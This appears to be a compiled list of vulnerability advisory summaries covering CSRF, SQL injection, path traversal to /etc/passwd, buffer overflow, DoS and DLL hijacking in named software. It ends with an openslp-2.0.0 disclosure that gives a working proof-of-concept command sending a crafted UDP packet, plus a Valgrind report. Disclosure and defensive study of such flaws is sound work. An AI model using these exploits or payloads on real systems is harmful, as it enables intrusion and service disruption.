Easyndexer 1.0 is vulnerable to Cross-Site Request Forgery (CSRF) which allows an attacker to add an administrator user to the application. An attacker can craft a malicious HTML page containing a form with the necessary parameters to add an administrator user. When a logged-in user visits the malicious page, the form will be automatically submitted and an administrator user will be added to the application.
A buffer overflow vulnerability exists in CuteFTP 9.3.0.3 which can be exploited by malicious people to cause a DoS (Denial of Service). The vulnerability is caused due to a boundary error when handling specially crafted input. This can be exploited to cause a stack-based buffer overflow via an overly long, specially crafted string passed to the application when connecting to a malicious FTP server. Successful exploitation of this vulnerability may allow execution of arbitrary code.
A SQL injection vulnerability exists in Facturation System 1.0, which allows an attacker to execute arbitrary SQL commands via the 'modid' parameter in a POST request to ajax/editar_producto.php. This can be exploited to read, modify or delete data from the database.
The Don 1.0.1 is vulnerable to SQL Injection. An attacker can send a specially crafted HTTP POST request to the vulnerable application in order to execute arbitrary SQL commands in the back-end database. This can be exploited to manipulate or disclose sensitive data.
A Cross-Site Request Forgery (CSRF) vulnerability was discovered in TP-Link Archer C50 Wireless Router 171227. An attacker can exploit this vulnerability to disclose the configuration file of the router.
This plugin can be used for manage the uploaded file (we can rename files, see a preview, delete and move them to other folders under wordpress upload folder). This plugin can be used by administrator, author, contributor and subscriber. An attacker can exploit this vulnerability to traverse the directory and access sensitive information such as the /etc/passwd file or move any file to any directory.
Data Center Audit 2.6.2 is vulnerable to SQL Injection in the 'username' parameter of the dca_login.php page. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands.
HeidiSQL 9.5.0.5196 is vulnerable to Denial of Service attack when a maliciously crafted bd.txt file is used. By copying the content of the bd.txt file to the clipboard and pasting it into the 'Write SQL log to file' field in the 'Preferences' > 'Logging' menu, the application will crash.
DLL hijacking is a type of vulnerability that can be exploited by attackers to execute malicious code on a target system. It occurs when an application looks for a specific DLL to run a certain task, but an attacker provides a malicious DLL instead. This malicious DLL is then executed on the target system, allowing the attacker to gain control of the system. The vulnerability was first discovered in 2010 and affects Windows systems.
I discovered some bugs in openslp-2.0.0 back in January, 2018. One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), and today I'm disclosing two more. This issue is an OOB read that does not crash the application. After the occurence of the bug the application actually detects the error and ignores the malicious packet. Proof of concept exploit: echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427 Valgrind report: ==27968== Invalid read of size 1 ==27968== at 0x412436: GetUINT16 (slp_message.c:63) ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) ==27968== by 0x40256B: main (slpd_main.c:699) ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) ==27968== by 0x40256B: main (slpd_main.c:699)
Services By CQR